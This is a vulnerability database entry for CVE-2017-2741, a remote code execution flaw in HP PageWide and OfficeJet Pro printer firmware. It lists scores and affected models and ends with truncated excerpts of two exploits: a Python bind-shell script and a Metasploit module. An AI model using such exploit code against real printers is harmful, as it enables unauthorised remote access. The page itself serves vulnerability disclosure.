1000
VMScore

CVE-2017-2741

Published: 23/01/2018 Updated: 03/10/2019
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

A potential security vulnerability has been identified with HP PageWide Printers, HP OfficeJet Pro Printers, with firmware prior to 1708D. This vulnerability could potentially be exploited to execute arbitrary code.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

hp j9v82a_firmware

hp j9v82b_firmware

hp j9v82c_firmware

hp j9v82d_firmware

hp j6u55a_firmware

hp j6u55b_firmware

hp j6u55c_firmware

hp j6u55d_firmware

hp k9z76a_firmware

hp k9z76d_firmware

hp d3q17a_firmware

hp d3q17c_firmware

hp d3q17d_firmware

hp d3q21a_firmware

hp d3q21c_firmware

hp d3q21d_firmware

hp d3q20a_firmware

hp d3q20b_firmware

hp d3q20c_firmware

hp d3q20d_firmware

hp d3q16a_firmware

hp d3q16b_firmware

hp d3q16c_firmware

hp d3q16d_firmware

hp d3q19a_firmware

hp d3q19d_firmware

hp d3q15a_firmware

hp d3q15b_firmware

hp d3q15d_firmware

hp j9v80a_firmware

hp j9v80b_firmware

hp j6u57b_firmware

hp d9l20a_firmware

hp d9l21a_firmware

hp d9l63a_firmware

hp d9l64a_firmware

hp t0g70a_firmware

hp j3p68a_firmware

Vendor Advisories

A potential security vulnerability has been identified with certain HP printers This vulnerability could potentially be exploited to execute arbitrary code ...
A potential security vulnerability has been identified with certain HP printers This vulnerability could potentially be exploited to execute arbitrary code ...

Exploits

## # Create a bind shell on an unpatched OfficeJet 8210 # Write a script to profiled and reboot the device When it comes # back online then nc to port 1270 # # easysnmp instructions: # sudo apt-get install libsnmp-dev # pip install easysnmp ## import socket import sys from easysnmp import snmp_set profile_d_script = ('if [ ! -p /tmp/pwned ]; t ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require "rex/proto/pjl" class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::SNMPClient include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager ...